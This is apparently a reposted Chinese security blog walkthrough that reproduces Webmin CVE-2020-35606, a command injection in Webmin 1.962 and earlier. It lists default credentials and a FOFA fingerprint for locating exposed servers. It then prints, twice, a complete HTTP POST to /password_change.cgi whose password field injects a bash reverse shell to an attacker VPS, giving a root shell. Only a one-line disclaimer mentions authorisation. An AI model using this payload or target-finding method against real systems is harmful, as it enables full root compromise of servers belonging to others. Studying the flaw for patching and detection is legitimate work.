【】-webmin CVE-2020-35606

0x01 webmin描述

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用根权限通过包含和的向量执行任意命令。默认账户密码:root:password

图片[1]-【】-webmin CVE-2020-35606-安全小天地

0x02 漏洞复现

影响版本:Webmin<=1.962

fofa:fid=”msMQZIdASsAWP2cTH1/Pow==”

1.输入账户密码root password登录

图片[2]-【】-webmin CVE-2020-35606-安全小天地

2.登录成功

图片[3]-【】-webmin CVE-2020-35606-安全小天地

3.burpsuit抓包

图片[4]-【】-webmin CVE-2020-35606-安全小天地

4.VPS监听1236端口

图片[5]-【】-webmin CVE-2020-35606-安全小天地

5.改包,并反弹shell,详情如下

POST /password_change.cgi HTTP/1.1

Host: x.x.x.x:15642

Cookie: redirect=1; testing=1; sid=57373e42133a6a8dff3944b4a48c9a63

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0

Accept: text/plain, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

X-Requested-From: 0

X-Requested-From-Tab: webmin

X-Requested-With: XMLHttpRequest

Dnt: 1

Referer: https://x.x.x.x:15642/

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

Te: trailers

Connection: close

Content-Length: 120

Content-Type: application/x-www-form-urlencoded



user=root111&pam=&expired=2&old=test|test|bash -c \"bash -i >%26 /dev/tcp/x.x.x.x/1236 0>%261\"&new1=test2&new2=test2

需要修改的地方:id参数替换为执行的exp

POST /password_change.cgi HTTP/1.1
Referer: https://x.x.x.x:55710/
user=root111&pam=&expired=2&old=test|test|bash -c \"bash -i >%26 /dev/tcp/x.x.x.x/1236 0>%261\"&new1=test2&new2=test2

6.执行命令成功,得到一个root权限的shell

图片[6]-【】-webmin CVE-2020-35606-安全小天地

(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)

本文转载于公众号:融云攻防实验室,原文地址:漏洞复现-webmin CVE-2020-35606

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称常用语 夸夸
夸夸
还有吗!没看够!
表情图片

    暂无评论内容